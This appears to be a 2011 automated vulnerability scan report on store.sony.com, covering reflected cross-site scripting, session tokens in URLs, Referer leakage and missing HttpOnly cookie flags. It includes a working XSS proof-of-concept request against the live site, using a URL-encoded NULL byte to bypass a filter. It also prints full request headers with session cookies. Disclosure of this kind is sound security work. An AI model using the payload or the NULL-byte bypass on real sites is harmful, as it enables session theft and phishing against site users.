XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, store.sony.com

Report generated by XSS.CX at Tue Sep 06 18:03:58 GMT-06:00 2011.

Note to Sony, please make contact with xss .at. xss.cx for additional details.... or use Live Chat


Loading

1. Cross-site scripting (reflected)

Note to Sony, please make contact with xss .at. xss.cx for additional details.... or use Live Chat

XSS in store.sony.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86, BHDB, Javascript Injection, Insecure Programming, Weak Configuration, Browser Hijacking, Phishing

2. Session token in URL

2.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

2.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

2.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

3. Cross-domain Referer leakage

3.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

3.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

3.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

4. Cross-domain script include

4.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

4.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

4.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

5. Cookie without HttpOnly flag set

5.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

5.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

5.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

5.4. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect

5.5. http://store.sony.com/webapp/wcs/stores/servlet/SYSearchAjax

5.6. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

6. Email addresses disclosed

6.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

6.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

6.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

7. Private IP addresses disclosed

7.1. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/omniture.js

7.2. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_bluray_eventListeners.js

7.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_custom_tabbing.js

7.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_global.js

7.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/js/ss_jsf_debug/ss_global.js

8. HTML does not specify charset

9. Content type incorrectly stated



1. Cross-site scripting (reflected)  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00119e4"><script>alert(1)</script>575ce0e01d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 119e4"><script>alert(1)</script>575ce0e01d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0&%00119e4"><script>alert(1)</script>575ce0e01d1=1 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 115393
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 115393
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:59:06 GMT
Connection: close
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<a href="SearchCatalog?langId=-1&.119e4"><script>alert(1)</script>575ce0e01d1=1&storeId=10151&y=0&catalogId=10551&Nty=1&x=0" id="" class="breadBoxRemoveLink" rel="">
...[SNIP]...

2. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


2.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

2.2. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

2.3. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclu
...[SNIP]...
<li class="catItem EPP_SONY_SEL_HIDDEN">
<a class="catItemLink" rel="Store: Right: Business Store" href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1">Business Store</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="/webapp/wcs/stores/servlet/SYPricingProgram?EPPToken=EPP_SMB&langId=-1&storeId=10151&catalogId=10551&URL=ContentDisplayView?cmsId%3Dsmb_landing_page%26catalogId%3D10551%26storeId%3D10151%26langId%3D-1" id="smbStoreGlobalFooterLink" rel="" class="directoryListingLink">Business Store</a>
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16192&SR=nav:electronics:tv_hm_ent:bluray:shop_compare:ss HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?mode=&action=search&pst=xss+playstation&pti=0&psti=0&first=1&sti=0&st=Laptop&ti=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; WC_PERSISTENT=ImH92K9%2bsUdm%2fbC2K7x0esz36a4%3d%0a%3b2011%2d09%2d06+14%3a49%3a35%2e092%5f1315334975092%2d379806%5f0; c_m=undefinedwww.sony.comwww.sony.com; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%5D; TS5bbf46=9061f70286583c9d3554e696bebd0db0238741ed7a8234554e666b3f; mbox=session#1315352920400-736912#1315354843|PC#1315334914578-928682.19#1316562583|check#true#1315353043; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=437018621; ensUID=249118483jocCbfxsy2s; s_visit=1; s_sq=%5B%5BB%5D%5D; _ensChanVal=Other|1315352981909; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.2.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_cc=true

Response

HTTP/1.1 200 OK
Cteonnt-Length: 104997
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 104997
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:52 GMT
Connection: close
Cache-Control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<link rel="canonical"
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/SonyStore" target="_blank">Twitter</a></li>
<li class="socialItem"><a class="socialLogo bloggerLogo seoImage" href="http://blog.discover.sonystyle.com/" target="_blank">Blog</a></li>
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="sgnlSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: SGNL By Sony" href="http://discover.sonystyle.com/sgnl/#">
<h3>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/SonyStore" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/SonyStore" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
